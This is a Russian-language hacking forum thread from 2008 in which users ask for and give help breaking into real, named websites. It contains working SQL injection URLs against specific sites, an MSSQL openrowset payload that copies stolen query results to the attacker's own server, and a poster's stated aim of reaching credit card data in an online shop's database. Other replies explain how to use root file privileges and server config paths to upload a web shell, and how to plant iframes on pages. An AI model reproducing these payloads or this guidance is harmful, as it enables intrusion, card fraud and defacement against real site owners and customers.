Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
     
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Это MSSQL!!!

    http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

    https://forum.antichat.ru/thread30501.html
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_forums)--

    Выводит какую-то абракадабру.

    Вот все таблицы, которые присутствуют на сервере: ).

    dtproperties','ssgb2_groups','ssgb2_messages'%20,'ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_banners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_forumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_messages','ssgb0_groups','ssgb0_messageGroups','ssgb0_messages','ssgb1_groups','ssgb1_messageGroups','ssgb1_messages','ssgb3_messageGroups','ssgb3_messages'%20,'ssis_nodes','ssm_groups','ssm_mailGroups','ssm_mails','ssn_newGroups','ssn_news','ssv_answers','ssv_groups','ssv_voteGroups','ssv_votes','sysconstraints','syssegments'.

    Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\

    Имя выводится как 'Âñå1',и чтойта ? )
     
    #1783 Велемир, 25 Apr 2008
    Last edited: 25 Apr 2008
  4. cyberia

    cyberia New Member

    Joined:
    29 Mar 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!

    Нашёл mssql-иньекцию в одном интернет-магазинчике.
    Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:

    ;insert+into+openrowset('sqloledb','uid=user3000;pwd=pass3000;network=DBMSSOCN;Address=777.777.103.4','select+line+from+base3000..tbltest')+select+table_name+from+information_schema.tables;--

    Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.

    В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.

    При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.

    Есть базы данных с именем cybersales. Думаю карты там.

    Запрос select+table_name+from+cybersales.information_schema.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.

    Видимо у текущего пользователя нет прав на просморт бд cybersales.

    Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.

    Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.

    Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!
     
    #1784 cyberia, 25 Apr 2008
    Last edited: 25 Apr 2008
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? :D)
    Вот так не бывает:
    "cybersales.information_schema.tables"

    information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
    Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
    Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
     
  6. cyberia

    cyberia New Member

    Joined:
    29 Mar 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.
     
    #1786 cyberia, 25 Apr 2008
    Last edited: 25 Apr 2008
  7. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

    Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+

    Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О

    P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера :)

    Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).

    Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)
     
    #1788 Велемир, 25 Apr 2008
    Last edited: 25 Apr 2008
  9. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    почитай вот эти статьи, найдешь много полезно про XSS:
    https://forum.antichat.ru/showthread.php?t=11807
    https://forum.antichat.ru/showthread.php?t=44125
    https://forum.antichat.ru/showthread.php?t=42951
     
  10. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    привет всем!
    что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
    ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ссылку
     
    1 person likes this.
  12. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
     
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    У тебя рутовый пользователь
    Code:
    POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+cp1251)+from+mysql.user/* HTTP/1.0
    и есть file_priv=Y, значит можешь читать\писать файлы
    Code:
    POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+using+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
    Причем маджик_квотс_гпс отключены.
    Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
     
    #1793 Constantine, 26 Apr 2008
    Last edited: 26 Apr 2008
    2 people like this.
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    немного поправлю, точное название httpd.conf или vhosts.conf
    кстати наличие magic quotes становится для меня во многих случаях не актуально
    https://forum.antichat.ru/showpost.php?p=663815&postcount=39
     
    3 people like this.
  15. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    disable_function:
    Local Value.
    system,exec,shell_exec,passthru,popen
    Master Value
    system,exec,shell_exec,passthru,popen


    Дальше как?
     
  16. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...
     
  17. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ?
    Examples: VzsGbVZoDDBValUkCCYNdw==
    BWcHdAEjVChRMQQz
    UWJXZwBnV25XOwUzCmM=

    p.s.
    Ershik
    Хм, вообще то еще Constantine указал на траблу с кодировкой -
    Хэши - MySQL v5.x
     
    1 person likes this.
  18. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    На100ящий
    дефолтные пути к конфигам тут:
    https://forum.antichat.ru/thread49775.html
    пишешь скриптик или руками через file_priv, далее по накатанной как я написал
     
  19. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
     
  20. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    если есть file_priv, залить шелл и повесить фрейм :)
    по другому никак...
     
Thread Status:
Not open for further replies.